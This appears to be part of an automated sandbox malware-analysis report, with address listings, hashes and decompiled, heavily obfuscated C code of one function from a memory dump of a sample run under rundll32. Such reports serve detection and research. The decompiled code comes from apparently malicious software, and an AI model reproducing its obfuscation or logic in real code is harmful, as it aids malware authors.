                                                                                                                      0x0069b738
                                                                                                                      0x0069b740
                                                                                                                      0x0069b748
                                                                                                                      0x0069b750
                                                                                                                      0x0069b75d
                                                                                                                      0x0069b75e
                                                                                                                      0x0069b762
                                                                                                                      0x0069b76d
                                                                                                                      0x0069b771
                                                                                                                      0x0069b779
                                                                                                                      0x0069b779
                                                                                                                      0x0069b779
                                                                                                                      0x0069b77e
                                                                                                                      0x0069b77e
                                                                                                                      0x0069b77e
                                                                                                                      0x0069b783
                                                                                                                      0x0069b783
                                                                                                                      0x0069b788
                                                                                                                      0x0069b788
                                                                                                                      0x0069b788
                                                                                                                      0x0069b788
                                                                                                                      0x0069b78a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069b790
                                                                                                                      0x0069b969
                                                                                                                      0x0069b96f
                                                                                                                      0x00000000
                                                                                                                      0x0069b796
                                                                                                                      0x0069b79c
                                                                                                                      0x0069b94a
                                                                                                                      0x00000000
                                                                                                                      0x0069b7a2
                                                                                                                      0x0069b7a8
                                                                                                                      0x0069b91c
                                                                                                                      0x0069b91d
                                                                                                                      0x0069b91e
                                                                                                                      0x0069b924
                                                                                                                      0x0069b926
                                                                                                                      0x0069b933
                                                                                                                      0x0069b938
                                                                                                                      0x0069b93b
                                                                                                                      0x0069b940
                                                                                                                      0x00000000
                                                                                                                      0x0069b7ae
                                                                                                                      0x0069b7b0
                                                                                                                      0x0069b8dc
                                                                                                                      0x0069b8e3
                                                                                                                      0x0069b8ef
                                                                                                                      0x0069b8f1
                                                                                                                      0x0069b8f6
                                                                                                                      0x0069b8fb
                                                                                                                      0x00000000
                                                                                                                      0x0069b7b6
                                                                                                                      0x0069b7bc
                                                                                                                      0x0069b7e9
                                                                                                                      0x0069b7f5
                                                                                                                      0x0069b803
                                                                                                                      0x0069b809
                                                                                                                      0x0069b866
                                                                                                                      0x0069b874
                                                                                                                      0x0069b877
                                                                                                                      0x0069b87c
                                                                                                                      0x0069b883
                                                                                                                      0x0069bada
                                                                                                                      0x0069bada
                                                                                                                      0x0069badf
                                                                                                                      0x0069bae4
                                                                                                                      0x00000000
                                                                                                                      0x0069b7be
                                                                                                                      0x0069b7c4
                                                                                                                      0x00000000
                                                                                                                      0x0069b7ca
                                                                                                                      0x0069b7dc
                                                                                                                      0x0069b7e2
                                                                                                                      0x0069b779
                                                                                                                      0x0069b779
                                                                                                                      0x0069b779
                                                                                                                      0x0069b77e
                                                                                                                      0x0069b77e
                                                                                                                      0x0069b783
                                                                                                                      0x00000000
                                                                                                                      0x0069b783
                                                                                                                      0x0069b779
                                                                                                                      0x0069b7c4
                                                                                                                      0x0069b7bc
                                                                                                                      0x0069b7b0
                                                                                                                      0x0069b7a8
                                                                                                                      0x0069b79c
                                                                                                                      0x0069bb18
                                                                                                                      0x0069bb22
                                                                                                                      0x0069bb22
                                                                                                                      0x0069b979
                                                                                                                      0x0069b97b
                                                                                                                      0x0069babf
                                                                                                                      0x0069bad0
                                                                                                                      0x0069bad3
                                                                                                                      0x0069bad5
                                                                                                                      0x0069bad7
                                                                                                                      0x00000000
                                                                                                                      0x0069b981
                                                                                                                      0x0069b981
                                                                                                                      0x0069b987
                                                                                                                      0x0069b9e7
                                                                                                                      0x0069b9f0
                                                                                                                      0x0069b9fb
                                                                                                                      0x0069ba00
                                                                                                                      0x0069ba0e
                                                                                                                      0x0069ba44
                                                                                                                      0x0069ba4b
                                                                                                                      0x0069ba57
                                                                                                                      0x0069ba68
                                                                                                                      0x0069ba6b
                                                                                                                      0x0069ba81
                                                                                                                      0x0069ba86
                                                                                                                      0x0069ba8d
                                                                                                                      0x00000000
                                                                                                                      0x0069b989
                                                                                                                      0x0069b989
                                                                                                                      0x0069b98f
                                                                                                                      0x0069bb0e
                                                                                                                      0x0069b995
                                                                                                                      0x0069b995
                                                                                                                      0x0069b997
                                                                                                                      0x00000000
                                                                                                                      0x0069b99d
                                                                                                                      0x0069b9c8
                                                                                                                      0x0069b9cf
                                                                                                                      0x0069b9d8
                                                                                                                      0x0069b9da
                                                                                                                      0x0069b9df
                                                                                                                      0x00000000
                                                                                                                      0x0069b9df
                                                                                                                      0x0069b997
                                                                                                                      0x0069b98f
                                                                                                                      0x0069b987
                                                                                                                      0x00000000
                                                                                                                      0x0069bae9
                                                                                                                      0x0069bae9
                                                                                                                      0x0069bae9
                                                                                                                      0x00000000
                                                                                                                      0x0069baf5
                                                                                                                      0x0069b783
                                                                                                                      0x0069b77e

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                      • API String ID: 0-1587349264
                                                                                                                      • Opcode ID: 836b69fe1a3394412ab7419254dce1bffbcb9f6ab428dad3e5968dad3c8ae874
                                                                                                                      • Instruction ID: 6aa1c1276f098050ef3b7191916308c6d3c3071175deae7a53cdbc2779475582
                                                                                                                      • Opcode Fuzzy Hash: 836b69fe1a3394412ab7419254dce1bffbcb9f6ab428dad3e5968dad3c8ae874
                                                                                                                      • Instruction Fuzzy Hash: 23520F711093809FD7B8CF61D58AA9BBBE2BBC4304F10891DE6DA96260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00695CC4 Relevance: 16.7, Strings: 13, Instructions: 434COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00695CC4() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t481;
				signed int _t496;
				void* _t499;
				intOrPtr _t503;
				void* _t539;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr _t553;
				intOrPtr* _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t567;
				signed int* _t568;
				void* _t572;

				_t568 =  &_v1764;
				_v1576 = 0x9a4c1d;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t499 = 0x9b91574;
				asm("stosd");
				asm("stosd");
				_v1684 = 0xe59dc4;
				_v1684 = _v1684 | 0xd0a48cbc;
				_v1684 = _v1684 + 0xffff2e59;
				_v1684 = _v1684 ^ 0xd0e4cc7c;
				_v1752 = 0x51b4b3;
				_v1752 = _v1752 ^ 0x5d9a17a0;
				_t550 = 0xb;
				_t555 = 0x76;
				_v1752 = _v1752 * 0xb;
				_v1752 = _v1752 ^ 0x54bb96eb;
				_v1752 = _v1752 ^ 0x53749705;
				_v1632 = 0xaf6c30;
				_v1632 = _v1632 << 6;
				_v1632 = _v1632 ^ 0x2bdb0c02;
				_v1720 = 0x499d0c;
				_v1720 = _v1720 | 0xb1a117f5;
				_v1720 = _v1720 / _t550;
				_v1720 = _v1720 + 0x97c7;
				_v1720 = _v1720 ^ 0x102d1aad;
				_v1704 = 0xc8e3b3;
				_v1704 = _v1704 * 0x32;
				_v1704 = _v1704 ^ 0x0819b8db;
				_v1704 = _v1704 | 0x44ca091a;
				_v1704 = _v1704 ^ 0x6fefc93f;
				_v1668 = 0xa62014;
				_v1668 = _v1668 | 0xeabb5dd4;
				_v1668 = _v1668 * 0x68;
				_v1668 = _v1668 ^ 0x5dcb1e30;
				_v1744 = 0xf6f234;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 ^ 0x80b741fb;
				_v1744 = _v1744 / _t555;
				_v1744 = _v1744 ^ 0x0165dd5f;
				_v1584 = 0x312e96;
				_v1584 = _v1584 + 0xffff2d5f;
				_v1584 = _v1584 ^ 0x003c0d9d;
				_v1712 = 0xa058cf;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 >> 8;
				_t556 = 0x70;
				_v1712 = _v1712 / _t556;
				_v1712 = _v1712 ^ 0x000e60b1;
				_v1624 = 0xe892f9;
				_v1624 = _v1624 | 0x8c579b60;
				_v1624 = _v1624 ^ 0x8cfff2b4;
				_v1616 = 0xaf548d;
				_v1616 = _v1616 << 0xe;
				_v1616 = _v1616 ^ 0xd52eab36;
				_v1732 = 0xb05ea2;
				_v1732 = _v1732 * 0x22;
				_t557 = 0x7e;
				_v1732 = _v1732 / _t557;
				_t558 = 0x6e;
				_v1732 = _v1732 / _t558;
				_v1732 = _v1732 ^ 0x000d3439;
				_v1592 = 0x913a71;
				_v1592 = _v1592 + 0xffff7440;
				_v1592 = _v1592 ^ 0x0095b07c;
				_v1696 = 0x599322;
				_v1696 = _v1696 / _t550;
				_v1696 = _v1696 ^ 0xb13d8f34;
				_v1696 = _v1696 ^ 0xb1384542;
				_v1644 = 0xa16dfa;
				_v1644 = _v1644 ^ 0xe1099bcb;
				_v1644 = _v1644 ^ 0xe1a9d34e;
				_v1648 = 0xb4e11f;
				_v1648 = _v1648 ^ 0x38d2ca48;
				_v1648 = _v1648 ^ 0x386e0f93;
				_v1608 = 0x5a22b;
				_t559 = 0x77;
				_t551 = 0x6a;
				_v1608 = _v1608 * 0x7a;
				_v1608 = _v1608 ^ 0x02a61538;
				_v1680 = 0xefbd86;
				_v1680 = _v1680 ^ 0x59656a46;
				_v1680 = _v1680 + 0xffff500f;
				_v1680 = _v1680 ^ 0x598ded80;
				_v1724 = 0x3ee43e;
				_v1724 = _v1724 + 0x7543;
				_v1724 = _v1724 ^ 0x2e29824a;
				_v1724 = _v1724 + 0xffff57f4;
				_v1724 = _v1724 ^ 0x2e1fc8aa;
				_v1580 = 0xa6d208;
				_v1580 = _v1580 | 0x568c9bfe;
				_v1580 = _v1580 ^ 0x56ae214d;
				_v1636 = 0x6d5924;
				_v1636 = _v1636 ^ 0x925c239d;
				_v1636 = _v1636 ^ 0x923215a4;
				_v1664 = 0x695adc;
				_v1664 = _v1664 / _t559;
				_v1664 = _v1664 + 0x9e91;
				_v1664 = _v1664 ^ 0x000b7b12;
				_v1728 = 0x27fcd;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 / _t551;
				_v1728 = _v1728 ^ 0x000e8750;
				_v1660 = 0x324e38;
				_t560 = 0xd;
				_v1660 = _v1660 / _t560;
				_v1660 = _v1660 ^ 0xc6795c1b;
				_v1660 = _v1660 ^ 0xc67cbc2f;
				_v1672 = 0xd5264d;
				_v1672 = _v1672 ^ 0x5df7965f;
				_v1672 = _v1672 << 0xa;
				_v1672 = _v1672 ^ 0x8ac02156;
				_v1760 = 0x48e2ee;
				_t213 =  &_v1760; // 0x48e2ee
				_t561 = 0x2d;
				_v1760 =  *_t213 / _t561;
				_v1760 = _v1760 ^ 0xd2c1db30;
				_v1760 = _v1760 ^ 0xa53e2936;
				_v1760 = _v1760 ^ 0x77fe21cd;
				_v1740 = 0xf20c88;
				_v1740 = _v1740 / _t551;
				_v1740 = _v1740 | 0xd96c60ad;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xe68a7191;
				_v1588 = 0x8e0aab;
				_t562 = 0x1b;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x354c6054;
				_v1748 = 0x4e8d34;
				_v1748 = _v1748 + 0x9e68;
				_v1748 = _v1748 ^ 0xb589d4ed;
				_v1748 = _v1748 ^ 0xb12a6144;
				_v1748 = _v1748 ^ 0x04e7453a;
				_v1756 = 0x3003da;
				_v1756 = _v1756 << 2;
				_v1756 = _v1756 + 0x3550;
				_v1756 = _v1756 + 0xffff4840;
				_v1756 = _v1756 ^ 0x00bf12fa;
				_v1764 = 0x8da8e8;
				_v1764 = _v1764 * 0x70;
				_v1764 = _v1764 | 0x3d3a45ac;
				_v1764 = _v1764 + 0xffff8f06;
				_v1764 = _v1764 ^ 0x3dfaa955;
				_v1600 = 0x16815c;
				_v1600 = _v1600 | 0x74adb72e;
				_v1600 = _v1600 ^ 0x74bac2ad;
				_v1736 = 0x173f97;
				_v1736 = _v1736 + 0x884f;
				_v1736 = _v1736 ^ 0x83e17d26;
				_v1736 = _v1736 ^ 0x7950511a;
				_v1736 = _v1736 ^ 0xfaacae3a;
				_v1640 = 0x9a0364;
				_v1640 = _v1640 >> 4;
				_v1640 = _v1640 ^ 0x000747da;
				_v1700 = 0xbe1482;
				_v1700 = _v1700 ^ 0x7ff54444;
				_v1700 = _v1700 << 4;
				_v1700 = _v1700 + 0xffff3bda;
				_v1700 = _v1700 ^ 0xf4b38ed0;
				_v1708 = 0xf0c015;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 * 0x59;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 ^ 0x00007652;
				_v1628 = 0xfcf2a2;
				_v1628 = _v1628 + 0x310b;
				_v1628 = _v1628 ^ 0x00fb84b7;
				_v1716 = 0xcaf3e1;
				_v1716 = _v1716 ^ 0x58005d51;
				_v1716 = _v1716 / _t562;
				_v1716 = _v1716 << 0xb;
				_v1716 = _v1716 ^ 0x4f02f929;
				_v1688 = 0xa9bf16;
				_t563 = 0x35;
				_v1688 = _v1688 / _t563;
				_v1688 = _v1688 * 0x4f;
				_v1688 = _v1688 ^ 0x00ffa3e1;
				_v1692 = 0x1a52e4;
				_v1692 = _v1692 | 0xd338ade8;
				_v1692 = _v1692 + 0xffff9820;
				_v1692 = _v1692 ^ 0xd337a700;
				_v1652 = 0xe154f6;
				_v1652 = _v1652 ^ 0xa48feb80;
				_v1652 = _v1652 ^ 0xa466ad28;
				_v1676 = 0x84491a;
				_v1676 = _v1676 + 0x31b5;
				_v1676 = _v1676 + 0x8487;
				_v1676 = _v1676 ^ 0x0081059f;
				_v1604 = 0xb120c5;
				_t564 = 0x4b;
				_t552 = _v1596;
				_t567 = _v1596;
				_v1604 = _v1604 * 0x65;
				_v1604 = _v1604 ^ 0x45e4f2f6;
				_v1656 = 0x2a0a41;
				_v1656 = _v1656 << 0xc;
				_t498 = _v1596;
				_v1656 = _v1656 / _t564;
				_v1656 = _v1656 ^ 0x022e7e7e;
				_v1612 = 0x774513;
				_v1612 = _v1612 | 0x207416f8;
				_v1612 = _v1612 ^ 0x207b64ec;
				_v1620 = 0x205158;
				_v1620 = _v1620 << 0xd;
				_v1620 = _v1620 ^ 0x0a275bbe;
				while(1) {
					L1:
					while(1) {
						_t539 = 0x5c;
						do {
							while(1) {
								L3:
								_t572 = _t499 - 0xa8fcf9f;
								if(_t572 > 0) {
									break;
								}
								if(_t572 == 0) {
									E00698F9E(_v1688, _v1692, _v1652, _v1676, _t567);
									_t568 =  &(_t568[3]);
									goto L19;
								} else {
									if(_t499 == 0x4b40ba0) {
										_t553 =  *0x6a3e10; // 0x0
										_t554 = _t553 + 0x1c;
										while(1) {
											__eflags =  *_t554 - _t539;
											if( *_t554 == _t539) {
												break;
											}
											_t554 = _t554 + 2;
											__eflags = _t554;
										}
										_t552 = _t554 + 2;
										_t499 = 0x9c63280;
										continue;
									} else {
										if(_t499 == 0x7e93d80) {
											_t567 = E00681CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
											_t568 =  &(_t568[0x13]);
											__eflags = _t567;
											if(_t567 == 0) {
												L19:
												_t499 = 0xfa48365;
												_t539 = 0x5c;
												continue;
											} else {
												_t499 = 0xacc4ac0;
												_v1596 = 1;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											}
										} else {
											if(_t499 == 0x9b91574) {
												_push(_v1624);
												_push(_v1684);
												_push(_v1712);
												_push( &_v1560);
												E006946BB(_v1744, _v1584);
												_t568 = _t568 - 0xc + 0x1c;
												_t499 = 0xf66352a;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											} else {
												if(_t499 != 0x9c63280) {
													goto L27;
												} else {
													_t496 = E0068912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
													_t498 = _t496;
													_t568 =  &(_t568[5]);
													if(_t496 != 0) {
														_t499 = 0x7e93d80;
														while(1) {
															_t539 = 0x5c;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _v1596;
							}
							__eflags = _t499 - 0xacc4ac0;
							if(_t499 == 0xacc4ac0) {
								E0068D6D8(_t567, _v1708, _t498, _v1628, _v1716);
								_t568 =  &(_t568[4]);
								_t499 = 0xa8fcf9f;
								_t539 = 0x5c;
								goto L27;
							} else {
								__eflags = _t499 - 0xf66352a;
								if(__eflags == 0) {
									_push(_v1592);
									_push(_v1732);
									_t481 = E0069DCF7(_v1616, 0x681020, __eflags);
									E0069176B( &_v1040, __eflags);
									_t503 =  *0x6a3e10; // 0x0
									_t431 = _t503 + 0x1c; // 0x1c
									_t432 = _t503 + 0x23c; // 0x23c
									E00691652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
									E0068A8B0(_v1636, _t481, _v1664);
									_t568 =  &(_t568[0xf]);
									_t499 = 0x4b40ba0;
									goto L1;
								} else {
									__eflags = _t499 - 0xfa48365;
									if(_t499 != 0xfa48365) {
										goto L27;
									} else {
										E00698F9E(_v1604, _v1656, _v1612, _v1620, _t498);
									}
								}
							}
							goto L24;
							L27:
							__eflags = _t499 - 0xd334e0e;
						} while (_t499 != 0xd334e0e);
						goto L24;
					}
				}
			}














































































                                                                                                                      0x00695cc4
                                                                                                                      0x00695cca
                                                                                                                      0x00695ce2
                                                                                                                      0x00695cea
                                                                                                                      0x00695cef
                                                                                                                      0x00695cf4
                                                                                                                      0x00695cf5
                                                                                                                      0x00695cf6
                                                                                                                      0x00695cfe
                                                                                                                      0x00695d06
                                                                                                                      0x00695d0e
                                                                                                                      0x00695d16
                                                                                                                      0x00695d1e
                                                                                                                      0x00695d2b
                                                                                                                      0x00695d2e
                                                                                                                      0x00695d31
                                                                                                                      0x00695d35
                                                                                                                      0x00695d3d
                                                                                                                      0x00695d45
                                                                                                                      0x00695d50
                                                                                                                      0x00695d58
                                                                                                                      0x00695d63
                                                                                                                      0x00695d6b
                                                                                                                      0x00695d7b
                                                                                                                      0x00695d7f
                                                                                                                      0x00695d87
                                                                                                                      0x00695d8f
                                                                                                                      0x00695d9c
                                                                                                                      0x00695da0
                                                                                                                      0x00695da8
                                                                                                                      0x00695db0
                                                                                                                      0x00695db8
                                                                                                                      0x00695dc0
                                                                                                                      0x00695dcd
                                                                                                                      0x00695dd1
                                                                                                                      0x00695dd9
                                                                                                                      0x00695de6
                                                                                                                      0x00695dea
                                                                                                                      0x00695dfa
                                                                                                                      0x00695dfe
                                                                                                                      0x00695e06
                                                                                                                      0x00695e11
                                                                                                                      0x00695e1c
                                                                                                                      0x00695e27
                                                                                                                      0x00695e2f
                                                                                                                      0x00695e34
                                                                                                                      0x00695e3d
                                                                                                                      0x00695e40
                                                                                                                      0x00695e44
                                                                                                                      0x00695e4c
                                                                                                                      0x00695e57
                                                                                                                      0x00695e62
                                                                                                                      0x00695e6d
                                                                                                                      0x00695e78
                                                                                                                      0x00695e80
                                                                                                                      0x00695e8b
                                                                                                                      0x00695e9a
                                                                                                                      0x00695ea4
                                                                                                                      0x00695ea9
                                                                                                                      0x00695eb3
                                                                                                                      0x00695eb8
                                                                                                                      0x00695ebc
                                                                                                                      0x00695ec4
                                                                                                                      0x00695ecf
                                                                                                                      0x00695eda
                                                                                                                      0x00695ee5
                                                                                                                      0x00695ef5
                                                                                                                      0x00695efb
                                                                                                                      0x00695f03
                                                                                                                      0x00695f0b
                                                                                                                      0x00695f16
                                                                                                                      0x00695f21
                                                                                                                      0x00695f2c
                                                                                                                      0x00695f37
                                                                                                                      0x00695f42
                                                                                                                      0x00695f4d
                                                                                                                      0x00695f60
                                                                                                                      0x00695f63
                                                                                                                      0x00695f66
                                                                                                                      0x00695f6d
                                                                                                                      0x00695f78
                                                                                                                      0x00695f80
                                                                                                                      0x00695f88
                                                                                                                      0x00695f90
                                                                                                                      0x00695f98
                                                                                                                      0x00695fa0
                                                                                                                      0x00695fa8
                                                                                                                      0x00695fb0
                                                                                                                      0x00695fb8
                                                                                                                      0x00695fc0
                                                                                                                      0x00695fcb
                                                                                                                      0x00695fd6
                                                                                                                      0x00695fe1
                                                                                                                      0x00695fec
                                                                                                                      0x00695ff7
                                                                                                                      0x00696002
                                                                                                                      0x00696012
                                                                                                                      0x00696016
                                                                                                                      0x0069601e
                                                                                                                      0x00696026
                                                                                                                      0x0069602e
                                                                                                                      0x00696033
                                                                                                                      0x00696040
                                                                                                                      0x00696044
                                                                                                                      0x0069604c
                                                                                                                      0x00696058
                                                                                                                      0x0069605b
                                                                                                                      0x0069605f
                                                                                                                      0x00696067
                                                                                                                      0x0069606f
                                                                                                                      0x00696077
                                                                                                                      0x0069607f
                                                                                                                      0x00696084
                                                                                                                      0x0069608e
                                                                                                                      0x00696096
                                                                                                                      0x0069609c
                                                                                                                      0x006960a1
                                                                                                                      0x006960a5
                                                                                                                      0x006960ad
                                                                                                                      0x006960b5
                                                                                                                      0x006960bd
                                                                                                                      0x006960cd
                                                                                                                      0x006960d3
                                                                                                                      0x006960db
                                                                                                                      0x006960e0
                                                                                                                      0x006960e8
                                                                                                                      0x006960fb
                                                                                                                      0x006960fe
                                                                                                                      0x00696105
                                                                                                                      0x00696110
                                                                                                                      0x00696118
                                                                                                                      0x00696120
                                                                                                                      0x00696128
                                                                                                                      0x00696130
                                                                                                                      0x00696138
                                                                                                                      0x00696140
                                                                                                                      0x00696145
                                                                                                                      0x0069614d
                                                                                                                      0x00696155
                                                                                                                      0x0069615d
                                                                                                                      0x0069616a
                                                                                                                      0x0069616e
                                                                                                                      0x00696176
                                                                                                                      0x0069617e
                                                                                                                      0x00696186
                                                                                                                      0x00696191
                                                                                                                      0x0069619c
                                                                                                                      0x006961a7
                                                                                                                      0x006961af
                                                                                                                      0x006961b7
                                                                                                                      0x006961bf
                                                                                                                      0x006961c7
                                                                                                                      0x006961cf
                                                                                                                      0x006961da
                                                                                                                      0x006961e2
                                                                                                                      0x006961ed
                                                                                                                      0x006961f5
                                                                                                                      0x006961fd
                                                                                                                      0x00696202
                                                                                                                      0x0069620a
                                                                                                                      0x00696212
                                                                                                                      0x0069621a
                                                                                                                      0x00696224
                                                                                                                      0x00696228
                                                                                                                      0x0069622d
                                                                                                                      0x00696235
                                                                                                                      0x00696240
                                                                                                                      0x0069624b
                                                                                                                      0x00696256
                                                                                                                      0x0069625e
                                                                                                                      0x0069626e
                                                                                                                      0x00696272
                                                                                                                      0x00696277
                                                                                                                      0x0069627f
                                                                                                                      0x0069628b
                                                                                                                      0x0069628e
                                                                                                                      0x00696297
                                                                                                                      0x0069629b
                                                                                                                      0x006962a3
                                                                                                                      0x006962ab
                                                                                                                      0x006962b5
                                                                                                                      0x006962bd
                                                                                                                      0x006962c5
                                                                                                                      0x006962d0
                                                                                                                      0x006962db
                                                                                                                      0x006962e6
                                                                                                                      0x006962ee
                                                                                                                      0x006962f6
                                                                                                                      0x006962fe
                                                                                                                      0x00696306
                                                                                                                      0x0069631b
                                                                                                                      0x0069631c
                                                                                                                      0x00696323
                                                                                                                      0x0069632a
                                                                                                                      0x00696331
                                                                                                                      0x0069633c
                                                                                                                      0x00696344
                                                                                                                      0x0069634f
                                                                                                                      0x00696356
                                                                                                                      0x0069635a
                                                                                                                      0x00696362
                                                                                                                      0x0069636d
                                                                                                                      0x00696378
                                                                                                                      0x00696383
                                                                                                                      0x0069638e
                                                                                                                      0x00696396
                                                                                                                      0x006963a1
                                                                                                                      0x006963a1
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x006963a9
                                                                                                                      0x006963a9
                                                                                                                      0x006963a9
                                                                                                                      0x006963a9
                                                                                                                      0x006963ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006963b1
                                                                                                                      0x006964ef
                                                                                                                      0x006964f4
                                                                                                                      0x00000000
                                                                                                                      0x006963b7
                                                                                                                      0x006963bd
                                                                                                                      0x006964bb
                                                                                                                      0x006964c1
                                                                                                                      0x006964c9
                                                                                                                      0x006964c9
                                                                                                                      0x006964cc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006964c6
                                                                                                                      0x006964c6
                                                                                                                      0x006964c6
                                                                                                                      0x006964ce
                                                                                                                      0x006964d1
                                                                                                                      0x00000000
                                                                                                                      0x006963c3
                                                                                                                      0x006963c9
                                                                                                                      0x0069649d
                                                                                                                      0x0069649f
                                                                                                                      0x006964a2
                                                                                                                      0x006964a4
                                                                                                                      0x006964f7
                                                                                                                      0x006964f7
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006964a6
                                                                                                                      0x006964a6
                                                                                                                      0x006964ab
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006963a8
                                                                                                                      0x006963a6
                                                                                                                      0x006963cb
                                                                                                                      0x006963d1
                                                                                                                      0x00696411
                                                                                                                      0x0069641f
                                                                                                                      0x00696423
                                                                                                                      0x00696435
                                                                                                                      0x00696436
                                                                                                                      0x0069643b
                                                                                                                      0x0069643e
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006963a8
                                                                                                                      0x006963d3
                                                                                                                      0x006963d9
                                                                                                                      0x00000000
                                                                                                                      0x006963df
                                                                                                                      0x006963f8
                                                                                                                      0x006963fd
                                                                                                                      0x006963ff
                                                                                                                      0x00696404
                                                                                                                      0x0069640a
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006963a8
                                                                                                                      0x006963a6
                                                                                                                      0x00696404
                                                                                                                      0x006963d9
                                                                                                                      0x006963d1
                                                                                                                      0x006963c9
                                                                                                                      0x006963bd
                                                                                                                      0x00696546
                                                                                                                      0x00696557
                                                                                                                      0x00696557
                                                                                                                      0x00696501
                                                                                                                      0x00696507
                                                                                                                      0x00696619
                                                                                                                      0x0069661e
                                                                                                                      0x00696621
                                                                                                                      0x00696625
                                                                                                                      0x00000000
                                                                                                                      0x0069650d
                                                                                                                      0x0069650d
                                                                                                                      0x00696513
                                                                                                                      0x00696558
                                                                                                                      0x00696564
                                                                                                                      0x0069656f
                                                                                                                      0x0069657d
                                                                                                                      0x006965bd
                                                                                                                      0x006965ca
                                                                                                                      0x006965ce
                                                                                                                      0x006965dc
                                                                                                                      0x006965f1
                                                                                                                      0x006965f6
                                                                                                                      0x006965f9
                                                                                                                      0x00000000
                                                                                                                      0x00696515
                                                                                                                      0x00696515
                                                                                                                      0x0069651b
                                                                                                                      0x00000000
                                                                                                                      0x00696521
                                                                                                                      0x0069653e
                                                                                                                      0x00696543
                                                                                                                      0x0069651b
                                                                                                                      0x00696513
                                                                                                                      0x00000000
                                                                                                                      0x00696626
                                                                                                                      0x00696626
                                                                                                                      0x00696626
                                                                                                                      0x00000000
                                                                                                                      0x00696632
                                                                                                                      0x006963a6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                      • API String ID: 0-2231434368
                                                                                                                      • Opcode ID: a3bdb346ddee00099ba496e25899e413b23e6f7f9ce42fe68dba9355de835d5a
                                                                                                                      • Instruction ID: 52020678311494f6f811c7c448ba99af39ed6c3dd7fcbdc53d267bb76fe324d7
                                                                                                                      • Opcode Fuzzy Hash: a3bdb346ddee00099ba496e25899e413b23e6f7f9ce42fe68dba9355de835d5a
